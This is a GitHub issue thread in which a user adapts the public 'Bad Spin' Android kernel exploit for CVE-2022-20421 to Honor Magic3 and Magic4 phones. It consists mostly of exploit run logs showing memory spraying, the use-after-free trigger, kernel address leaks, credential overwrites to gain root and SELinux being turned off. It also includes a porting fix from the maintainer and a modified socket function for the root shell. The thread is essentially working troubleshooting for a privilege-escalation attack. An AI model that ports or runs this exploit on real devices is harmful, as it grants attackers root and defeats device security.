0xkol/badspin

Failed to adapt the exploit in a new device

Securee opened this issue · 13 comments

I want to adapt the exploit to support a new device (not Samsung or Google Pixel):
.android_version = 12,
.android_security_patch.year = 2022,
.android_security_patch.month = 3,
.kernel_version = KERNEL_VERSION(5, 4, 134),
.kimg_to_lm = pixel_kimg_to_lm,
.find_kbase = noop_kbase,
The output of uname -a is:
Linux localhost 5.4.134-qgki-g27c154db7d6e #1 SMP PREEMPT Fri Mar 25 11:44:48 CST 2022 aarch64

I have tried many times, but it failed with the following output and then the phone panicked:

Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[8265:8265] New binder client: A
[8266:8266] New binder client: B
[8267:8267] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 4)
Reading ptmx 0
Testing ptmx 1 (fd 5)
Reading ptmx 1
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 8320
[pipe_process:8321] Pinned to CPU 0
[pipe_process:8323] Pinned to CPU 2
[pipe_process:8324] Pinned to CPU 3
[pipe_process:8322] Pinned to CPU 1
[pipe_process:8325] Pinned to CPU 4
[pipe_process:8326] Pinned to CPU 5
[pipe_process:8327] Pinned to CPU 6
[pipe_process:8328] Pinned to CPU 7
[fd_master_process] pid = 8329
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:8383] 30000 files sprayed
[shaper_process:8385] 30000 files sprayed
[shaper_process:8384] 30000 files sprayed
[shaper_process:8382] 30000 files sprayed
[shaper_process:8381] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=8386
[timer_master_process] Wait for C to enter spin_lock()
[8387:8387] New binder client: A
[8389:8389] New binder client: C
[8388:8388] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
.....................................!............
[x] Failed.

[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 8417
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:8473] 30000 files sprayed
[shaper_process:8469] 30000 files sprayed
[shaper_process:8470] 30000 files sprayed
[shaper_process:8472] 30000 files sprayed
[shaper_process:8471] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=8474
[timer_master_process] Wait for C to enter spin_lock()
[8476:8476] New binder client: B
[8480:8480] New binder client: C
[8475:8475] New binder client: A
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
B: Searching for magic badcab1ebadcab1e....
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
.................................*................

The panic info is:
mReason: PANIC
sReason:page_request
info: PC filp_close+0x28/0xbc

And I have tried changing NR_EPFDS from 500 to 200, but it failed with the same error.
BTW, it seems to crash randomly.

If I use another kernel, 5.10.66, on the same device, it gives me the following error:

Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[6951:6951] New binder client: A
[6952:6952] New binder client: B
[6953:6953] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
B: Searching for magic badcab1ebadcab1e....
Txn size: 1023.562500KB
B: Destroying
C: Wait for A...
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 4)
Reading ptmx 0
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 7358
[pipe_process:7359] Pinned to CPU 0
[pipe_process:7361] Pinned to CPU 2
[pipe_process:7364] Pinned to CPU 5
[pipe_process:7365] Pinned to CPU 6
[pipe_process:7363] Pinned to CPU 4
[pipe_process:7362] Pinned to CPU 3
[pipe_process:7360] Pinned to CPU 1
[pipe_process:7366] Pinned to CPU 7
[fd_master_process] pid = 7367
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:7441] 30000 files sprayed
[shaper_process:7439] 30000 files sprayed
[shaper_process:7440] 30000 files sprayed
[shaper_process:7438] 30000 files sprayed
[shaper_process:7437] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=7463
[timer_master_process] Wait for C to enter spin_lock()
[7466:7466] New binder client: C
[7465:7465] New binder client: B
[7464:7464] New binder client: A
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
B: Finish.
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
[timer_master_process] Done.
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
...............*..................................
[x] Success.

[x] send_dup_done done.

[x] usleep 25s done.

[x] write ipe_sockets done.

[fd_master_process] Received 512 pipes
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Cleanup shapers
shaper process pid = 7437
shaper process pid = 7438
shaper process pid = 7439
shaper process pid = 7440
shaper process pid = 7441
Done.
Cleanup spawner
Cleanup done.
[x] Trying to escalate...
Write page to every pipe
Identifying pipe
Error: failed to find corrupted pipe

[fd_master_process] pid = 7528
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:7581] 30000 files sprayed
[shaper_process:7583] 30000 files sprayed
[shaper_process:7584] 30000 files sprayed
[shaper_process:7580] 30000 files sprayed
[shaper_process:7582] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=7596
[timer_master_process] Wait for C to enter spin_lock()
[7597:7597] New binder client: A
[7607:7607] New binder client: C
[7599:7599] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
monitor_thread_a: Waiting for death notification
B: Destroying
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
B: Finish.
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
(crash)
It seems to fail to find the corrupted pipe.

0xkol commented

Not sure why it fails to find the corrupted pipe. The first log seems similar to this issue: #1

Which device is it?

The first log is from an Honor Magic3 with kernel 5.4 and the second log is from a Magic4 with kernel 5.10.66. I know I may need to make some changes to kimg_to_lm and find_kbase, but it doesn't seem to have gotten that far yet.

And by printing the log, ret = 0x00001000 when reading pipe tmp_pipe[0] with FIONREAD in the code:
SYSCHK(ioctl(tmp_pipe[0], FIONREAD, &ret));

0xkol commented

Unfortunately, due to my current commitments and the unavailability of an appropriate Android device for testing, I won't be able to assist you with this particular problem.

I hope you're able to resolve the issue independently, and if you have any questions related to the project in the future, please don't hesitate to ask. Thank you for your understanding.

Thank you anyway, I will try to resolve the issue myself first.

@0xkol, now I can read the pipe correctly.

Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[8833:8833] New binder client: A
[8835:8835] New binder client: C
[8834:8834] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
B: Searching for magic badcab1ebadcab1e....
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 5)
Reading ptmx 0
Testing ptmx 1 (fd 6)
Reading ptmx 1
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 8890
[pipe_process:8891] Pinned to CPU 0
[pipe_process:8892] Pinned to CPU 1
[pipe_process:8893] Pinned to CPU 2
[pipe_process:8894] Pinned to CPU 3
[pipe_process:8897] Pinned to CPU 6
[pipe_process:8895] Pinned to CPU 4
[pipe_process:8896] Pinned to CPU 5
[pipe_process:8898] Pinned to CPU 7
[fd_master_process] pid = 8899
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:8952] 30000 files sprayed
[shaper_process:8951] 30000 files sprayed
[shaper_process:8953] 30000 files sprayed
[shaper_process:8954] 30000 files sprayed
[shaper_process:8955] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=8957
[timer_master_process] Wait for C to enter spin_lock()
[8960:8960] New binder client: C
[8959:8959] New binder client: B
[8958:8958] New binder client: A
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
[timer_master_process] Done.
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
...............*..................................
[fd_master_process] Received 512 pipes
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[x] Trying to escalate...
Write page to every pipe
Identifying pipe
[identify_pipe] Found corrupted pipe! ret = 414143c4
Closing unneeded ptmxs
Closing unneeded pipes
[x] Found corrupted ptmx and pipe.
[fd_master_process] Done.
[x] Leaking pipe buffer...
[leak_pipe_buffer] Write to the pipe
[leaker_thread] Wrote 1024 bytes to ptmx
[leak_pipe_buffer] Try read 1024 bytes from ptmx
[x] Leaked pipe buffer oprerations: ffffffebc953c768
[x] Leaked pipe buffer page : ffffffff1fd16780
[+]Begin to find_kallsyms.
[__pipe_kread] kaddr = ffffff8000000000 page = fffffffeffe00000 size = 00001000
[__pipe_kread] Try to read pipe after write_fake_pipe_buffer
(crash)

I rebooted the device repeatedly, and the following lines from cat /proc/iomem are the same every time:
a8000000-aa6affff : Kernel code
aa9b0000-aacbffff : Kernel data
So I think there is no physical kASLR on my device. Right?
If yes, then the kimg_to_lm I used, pixel_kimg_to_lm, is correct, and what remains is the find_kbase function, which I may need to modify. But how can I judge whether I need to modify it or not?

From the debug log, it seems to crash in:
find_kallsyms --> rw->kread --> pipe_kread --> __pipe_kread with kaddr = ffffff8000000000, page = fffffffeffe00000.
PAGE_OFFSET = 0xffffff8000000000UL and VMEMMAP_START = 0xfffffffeffe00000UL.

0xkol commented

Maybe you should add the offset 0x28000000

@0xkol You are right. After I added 0x28000000 to kimg_to_lm, it seems to go ahead:

Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[7533:7533] New binder client: A
[7535:7535] New binder client: C
[7534:7534] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
B: Searching for magic badcab1ebadcab1e....
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 4)
Reading ptmx 0
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 7999
[pipe_process:8000] Pinned to CPU 0
[pipe_process:8002] Pinned to CPU 2
[pipe_process:8003] Pinned to CPU 3
[pipe_process:8004] Pinned to CPU 4
[pipe_process:8001] Pinned to CPU 1
[pipe_process:8006] Pinned to CPU 6
[pipe_process:8005] Pinned to CPU 5
[pipe_process:8007] Pinned to CPU 7
[fd_master_process] pid = 8008
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:8083] 30000 files sprayed
[shaper_process:8082] 30000 files sprayed
[shaper_process:8075] 30000 files sprayed
[shaper_process:8074] 30000 files sprayed
[shaper_process:8080] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=8112
[timer_master_process] Wait for C to enter spin_lock()
[8113:8113] New binder client: A
[8114:8114] New binder client: B
[8115:8115] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
B: Searching for magic badcab1ebadcab1e....
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
..................................*...............
[fd_master_process] Received 512 pipes
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[x] Trying to escalate...
Write page to every pipe
Identifying pipe
[identify_pipe] Found corrupted pipe! ret = 414144f5
Closing unneeded ptmxs
Closing unneeded pipes
[x] Found corrupted ptmx and pipe.
[fd_master_process] Done.
[x] Leaking pipe buffer...
[leak_pipe_buffer] Write to the pipe
[leaker_thread] Wrote 1024 bytes to ptmx
[leak_pipe_buffer] Try read 1024 bytes from ptmx
[x] Leaked pipe buffer oprerations: ffffffd98753c768
[x] Leaked pipe buffer page : ffffffff2042fc80
kallsyms_token_table file offset 0x2213b20
kallsyms_token_index file offset 0x2213ed0
kallsyms_markers file offset 0x22132b0
kallsyms_num_syms (approx) 0x21b00
kallsyms_num_syms (exact) 0x21a4d
kallsyms_relative_base 0xffffffd985200000
kallsyms_names file offset 0x20313b8
kallsyms_offsets file offset 0x1faaa70
[x] kallsyms found successfully!
[x] Kernel base: ffffffd985200000
[x] Found init_task: ffffffd987bcbe40
[x] task_struct offsets:
tasks at 1224
pid at 1480
tgid at 1484
thread_group at 1656
files at 1984
cred at 1920
[x] files_struct offsets:
fdt at 32
[x] task_struct: ffffff882959b780
[pipe_close] Found task struct: ffffff802316dc80
file->private_data offset: 216
Candidate write_buf offset: 752 (ffffff8023050000)
Switched to UAO-based read/write primitive
[x] Successfully upgraded to stable RW primitives. \o/
Fixup zombie processes
Fixup pid = 7999
Found files struct: ffffff87a320bc80
Now killing pid 7999

[x] Success! Time to root
Finding init cred
init task_struct = ffffff878041a500
init cred = ffffff87a023f180 (usage 3)
Switch 8545:-1 to new creds (ffffff87a023f180)
task_struct (8545:-1) = ffffff882959ca00 cred = ffffff879e8da600
Change cred and real_cred
Done
Setting selinux_state->enforce to 0
status page = ffffffff1ead5e00
status page virt = ffffff87b3578000
Done
Switch 7529:7529 to new creds (ffffff87a023f180)
task_struct (7529:7529) = ffffff802316dc80 cred = ffffff8791576600
Change cred and real_cred
Done
[x] Reading live selinux policy
[x] New selinux policy loaded
Switch 7529:7529 to new creds (ffffff8791576600)
task_struct (7529:7529) = ffffff802316dc80 cred = ffffff87a023f180
Change cred and real_cred
Done
Setting selinux_state->enforce to 1
status page = ffffffff1ead5e00
status page virt = ffffff87b3578000
Done
Switch 7529:7529 to new creds (ffffff87a023f180)
task_struct (7529:7529) = ffffff802316dc80 cred = ffffff8791576600
Change cred and real_cred
Done
escalate exit status = 0
Reset process state
Could not open socket connection
(The socket call seems to fail with errno=11, "try again". With netstat -ltw I can't find a listening port 1337, so the connect failed.)

It seems that we are only one step away from final success.

Finally, I resolved the socket problem by modifying the connect_to function:
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

/* Modified connect_to(): instead of connecting out to a listener on `port`,
 * bind a listening socket on that port and accept the first incoming client.
 * `ip` is kept for signature compatibility but is not used. LOG() is the
 * project's logging macro. Returns the accepted client fd, or -1 on error. */
int connect_to(const char *ip, int port)
{
    (void)ip;
    int sockfd = socket(PF_INET, SOCK_STREAM, 0);
    if (sockfd < 0)
        return -1;

    struct sockaddr_in addr, cliAddr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons((uint16_t)port);
    addr.sin_addr.s_addr = INADDR_ANY;

    if (bind(sockfd, (struct sockaddr *)&addr, sizeof(addr)) < 0 ||
        listen(sockfd, 5) < 0) {
        close(sockfd);
        return -1;
    }
    LOG("[%s] waiting to connect to the socket......\n", __func__);

    /* accept() takes a socklen_t, not an int, for the address length. */
    socklen_t len = sizeof(cliAddr);
    int clientfd = accept(sockfd, (struct sockaddr *)&cliAddr, &len);
    close(sockfd);              /* the listening socket is no longer needed */
    if (clientfd < 0)
        return -1;
    LOG("[%s] client connect to the socket\n", __func__);
    return clientfd;
}

Thank you very much for your help, @0xkol.

@Securee could you tell me what steps were necessary to get the pipe to be read?